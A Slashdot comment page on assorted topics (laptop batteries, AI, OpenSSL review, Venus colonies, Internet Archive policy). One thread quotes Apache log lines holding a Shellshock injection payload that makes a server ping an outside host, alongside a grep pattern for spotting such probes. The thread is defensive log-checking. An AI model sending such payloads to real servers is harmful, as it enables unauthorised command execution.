Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×

Comment Re:I'm so sad... :( (Score 1) 97

None of the batteries in any of my laptops work anymore.... I have zero choices to vote for!

I'm in the same boat. I have two old Dell Inspirons and the battery has failed in both. I just run them off of power, and hibernate/suspend-to-disk when done working (which I have configured to happen automatically when I shut the lid). It's not as nice as having a working battery, but it's useable. I could buy new batteries, but last I checked, the official Dell ones are several hundred dollars, and third-party knockoff ones are almost a hundred. That's not worth it for my 10 year old laptops that I got for free.

Submission + - XKCD covers comet landing "live" (xkcd.com) 1

garry_g writes: In yet another epic animated series, XKCD ist currently covering the Philae landing on comet 67P/Tschurjumow-Gerassimenko in real time.

Comment Re:Only the beginning (Score 1) 236

You can check if you've been scanned for exploitable CGIs using something like (adjust apache logs path accordingly):

grep cgi /var/log/apache2/access*|egrep "};|}\s*;"

Thanks for the nice grep work - found one attempt to get my box to rat itself out via ping:

/var/log/apache2/access.log:89.207.135.125 - - [25/Sep/2014:03:52:14 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1799 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

Fortunately I was patched several hours prior to that.

Would there be any way for that probe to execute against a static 404 page - no cgi executing?

yep: /var/log/apache2/access.log:89.207.135.125 - - [25/Sep/2014:09:26:29 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 491 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" That's pretty quick. Fortunately, I didn't have that cgi script, but still quite scary.

Comment Re:AI is always (Score 1) 564

Algorithms are not AI. Everything you describe is simply a matter of following a human-generated set of instructions. That is not AI.

Algorithms are not AI. Everything you describe is simply a matter of following a human-generated set of instructions. That is not AI.

no, the difference is Big Data. Before "Big Data", machine translation, self-driving vehicles, chess, etc. were problems that were attempted to be solved by algorithms written by humans. These kinds of algorithms would be full of heuristics such as "if you are in situation X, perform behavior Y". This led to fragile, clunky code. Nowadays, with Big Data, the algorithms are more like, "see what everybody else is doing in situations similar to X"

Comment Re:Whatever you may think ... (Score 1) 447

It would be nice if they had some sort of code review in place for this sort of stuff. However, this isn't a paid project, so the developers writing this are doing arguably the best they can.

The code was reviewed. The commit log shows that the reviewer was Stephen Henson (thanks to slashdot user grub for pointing this out.)

Comment Re:Awesome (Score 1) 193

Personally I wish we'd just man up and shoot the appropriate organisms into Venus' atmosphere to start the terraforming process.

Because breathable Earth-normal atmosphere is a lifting gas on Venus, we could make a relatively low budget colony without any terraforming. Just send a big balloon. It could ride the relatively stable upper atmospheric winds on Venus, circling the planet every 4 earth days, and be at standard pressure, so any hull breach would not result in explosive decompression.

Comment Re:Robots.txt (Score 1) 234

The Internet Archive says that it subscribes to the The Oakland Archive Policy which for |requests by governments" says:

Archivists will exercise best-efforts compliance with applicable court orders Beyond that, as noted in the Library Bill of Rights, 'Libraries should challenge censorship in the fulfillment of their responsibility to provide information and enlightenment.'

Seems like this may just have slipped past them. Let's make sure they know they need to sort it out... Surely they only removed it from the Wayback Machine, not from the archive itself.

That's actually a really good point. I wonder if there's any justification in the Policy for retroactively removing content based on current robots.txt

Slashdot Top Deals

You knew the job was dangerous when you took it, Fred. -- Superchicken

Working...